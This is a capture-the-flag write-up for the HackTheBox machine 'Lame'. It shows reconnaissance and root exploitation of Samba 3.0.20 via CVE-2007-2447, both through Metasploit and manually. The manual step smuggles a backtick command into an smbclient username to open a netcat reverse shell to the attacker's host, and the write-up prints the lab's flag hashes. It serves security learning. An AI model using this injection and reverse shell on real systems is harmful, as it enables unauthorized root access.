HackTheBox · Medium

Lame

Platform: HackTheBox

Difficulty: Medium

OS: Linux

Category: Network, SMB, CVE

Classic HackTheBox machine exploiting a critical vulnerability in Samba 3.0.20 (CVE-2007-2447). The username map script command injection flaw grants immediate root access without privilege escalation. An excellent lesson in the importance of patch management.

nmap metasploit smbclient CVE-2007-2447

Vulnerability Background

CVE-2007-2447 — Samba Username Map Script

Samba versions 3.0.0 through 3.0.25rc3 allow remote code execution when using the non-default "username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. The flaw requires no authentication and runs with the same privileges as the Samba daemon — typically root.

CVSS Score: 10.0 (Critical) — No auth required, remote code execution as root

1. Reconnaissance

Nmap Service Scan

Identify all running services and their versions — version detection is critical here.

$ nmap -sV -sC -p- --min-rate 5000 10.10.10.3

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 3.0.20
3632/tcp open distccd distccd v1

| smb-security-mode:
| account_used: guest
| authentication_level: user

Samba 3.0.20 — immediately matches CVE-2007-2447 version range

vsftpd 2.3.4 also has a backdoor (CVE-2011-2523) but it was patched on this machine

2. Exploitation

Metasploit — usermap_script

Use the Metasploit module for CVE-2007-2447 to get an instant root shell.

$ msfconsole

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 10.10.10.3
msf6 exploit(...) > set LHOST 10.10.14.x
msf6 exploit(...) > run

[*] Started reverse TCP handler on 10.10.14.x:4444
[*] Command shell session 1 opened

root@lame:/# # direct root shell — no privesc needed

Manual Exploitation (without Metasploit)

Replicate the exploit manually using smbclient to understand the underlying mechanism.

# Start netcat listener
$ nc -lvnp 4444

# Exploit via smbclient — inject command in username field
$ smbclient //10.10.10.3/tmp \
-U "./=`nohup nc -e /bin/bash 10.10.14.x 4444`"

# Listener receives connection:
connect to [10.10.14.x] from (UNKNOWN) [10.10.10.3]
$ id
uid=0(root) gid=0(root)

The backtick injection in the username field triggers command execution during auth negotiation

Post-Exploitation — Flags

root@lame:/# find / -name "*.txt" -path "*/home/*" 2>/dev/null
/home/makis/user.txt

root@lame:/# cat /home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5

root@lame:/# cat /root/root.txt
92caac3be140ef409e45721348a4e9df

user.txt

69454a937d94f5f0225ea00acd2e84c5

root.txt

92caac3be140ef409e45721348a4e9df

Key Takeaways

Unpatched Samba 3.0.20 = instant root. This CVE is from 2007 — patch management is critical

Always check service versions in nmap output — a version number can reveal critical CVEs immediately

The attack chain was: scan → identify version → search CVE → exploit → root. No pivoting needed

Understanding manual exploitation (without Metasploit) shows how injection works at the protocol level